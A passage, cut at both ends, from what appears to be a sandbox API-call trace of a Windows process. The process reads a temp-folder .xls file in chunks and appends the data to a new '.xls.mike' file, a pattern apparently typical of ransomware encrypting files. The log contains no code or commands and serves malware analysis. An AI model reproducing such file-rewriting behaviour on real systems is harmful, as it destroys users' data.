nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0147.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.393] GetFileType (hFile=0x1d4) returned 0x1 [0147.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0147.393] GetFileType (hFile=0x1d4) returned 0x1 [0147.393] CloseHandle (hObject=0x1d4) returned 1 [0147.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.394] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0147.394] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.395] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), fInfoLevelId=0x0, lpFileInformation=0x22ac230 | out: lpFileInformation=0x22ac230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb1fd720, ftCreationTime.dwHighDateTime=0x1d4c9a9, ftLastAccessTime.dwLowDateTime=0xfe1df410, ftLastAccessTime.dwHighDateTime=0x1d4d4fc, ftLastWriteTime.dwLowDateTime=0xfe1df410, ftLastWriteTime.dwHighDateTime=0x1d4d4fc, nFileSizeHigh=0x0, nFileSizeLow=0x189f4)) returned 1 [0147.395] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.395] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), fInfoLevelId=0x0, lpFileInformation=0x22ac52c | out: lpFileInformation=0x22ac52c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb1fd720, ftCreationTime.dwHighDateTime=0x1d4c9a9, ftLastAccessTime.dwLowDateTime=0xfe1df410, ftLastAccessTime.dwHighDateTime=0x1d4d4fc, ftLastWriteTime.dwLowDateTime=0xfe1df410, ftLastWriteTime.dwHighDateTime=0x1d4d4fc, nFileSizeHigh=0x0, nFileSizeLow=0x189f4)) returned 1 [0147.395] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.396] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.396] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.396] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.399] GetFileType (hFile=0x1d4) returned 0x1 [0147.399] GetFileType (hFile=0x1d4) returned 0x1 [0147.399] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.400] WriteFile (in: hFile=0x1d4, lpBuffer=0x22ad2b8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22ad2b8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), fInfoLevelId=0x0, lpFileInformation=0x22acdec | out: lpFileInformation=0x22acdec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb1fd720, ftCreationTime.dwHighDateTime=0x1d4c9a9, ftLastAccessTime.dwLowDateTime=0xfe1df410, ftLastAccessTime.dwHighDateTime=0x1d4d4fc, ftLastWriteTime.dwLowDateTime=0xfe1df410, ftLastWriteTime.dwHighDateTime=0x1d4d4fc, nFileSizeHigh=0x0, nFileSizeLow=0x189f4)) returned 1 [0147.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.402] GetFileType (hFile=0x1d4) returned 0x1 [0147.402] GetFileType (hFile=0x1d4) returned 0x1 [0147.402] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.402] ReadFile (in: hFile=0x1d4, lpBuffer=0x22ae3d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22ae3d4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.405] GetFileType (hFile=0x1d4) returned 0x1 [0147.405] GetFileType (hFile=0x1d4) returned 0x1 [0147.405] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.405] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.406] GetFileType (hFile=0x1d4) returned 0x1 [0147.406] GetFileType (hFile=0x1d4) returned 0x1 [0147.406] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.406] ReadFile (in: hFile=0x1d4, lpBuffer=0x22bb37c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22bb37c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.408] GetFileType (hFile=0x1d4) returned 0x1 [0147.408] GetFileType (hFile=0x1d4) returned 0x1 [0147.408] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.409] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.410] GetFileType (hFile=0x1d4) returned 0x1 [0147.410] GetFileType (hFile=0x1d4) returned 0x1 [0147.410] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.410] ReadFile (in: hFile=0x1d4, lpBuffer=0x22c8324, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22c8324*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.411] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.412] GetFileType (hFile=0x1d4) returned 0x1 [0147.412] GetFileType (hFile=0x1d4) returned 0x1 [0147.412] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.413] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.413] GetFileType (hFile=0x1d4) returned 0x1 [0147.413] GetFileType (hFile=0x1d4) returned 0x1 [0147.413] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0147.414] ReadFile (in: hFile=0x1d4, lpBuffer=0x22d52cc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d52cc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.415] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.415] GetFileType (hFile=0x1d4) returned 0x1 [0147.415] GetFileType (hFile=0x1d4) returned 0x1 [0147.415] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0147.416] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.417] GetFileType (hFile=0x1d4) returned 0x1 [0147.417] GetFileType (hFile=0x1d4) returned 0x1 [0147.417] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0147.417] ReadFile (in: hFile=0x1d4, lpBuffer=0x22e2274, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22e2274*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.418] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.419] GetFileType (hFile=0x1d4) returned 0x1 [0147.419] GetFileType (hFile=0x1d4) returned 0x1 [0147.419] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0147.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.420] GetFileType (hFile=0x1d4) returned 0x1 [0147.420] GetFileType (hFile=0x1d4) returned 0x1 [0147.420] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0147.421] ReadFile (in: hFile=0x1d4, lpBuffer=0x22ef21c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22ef21c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.422] GetFileType (hFile=0x1d4) returned 0x1 [0147.423] GetFileType (hFile=0x1d4) returned 0x1 [0147.423] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0147.423] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.424] GetFileType (hFile=0x1d4) returned 0x1 [0147.424] GetFileType (hFile=0x1d4) returned 0x1 [0147.424] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0147.424] ReadFile (in: hFile=0x1d4, lpBuffer=0x22fc1c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22fc1c4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.426] GetFileType (hFile=0x1d4) returned 0x1 [0147.426] GetFileType (hFile=0x1d4) returned 0x1 [0147.426] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0147.427] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: 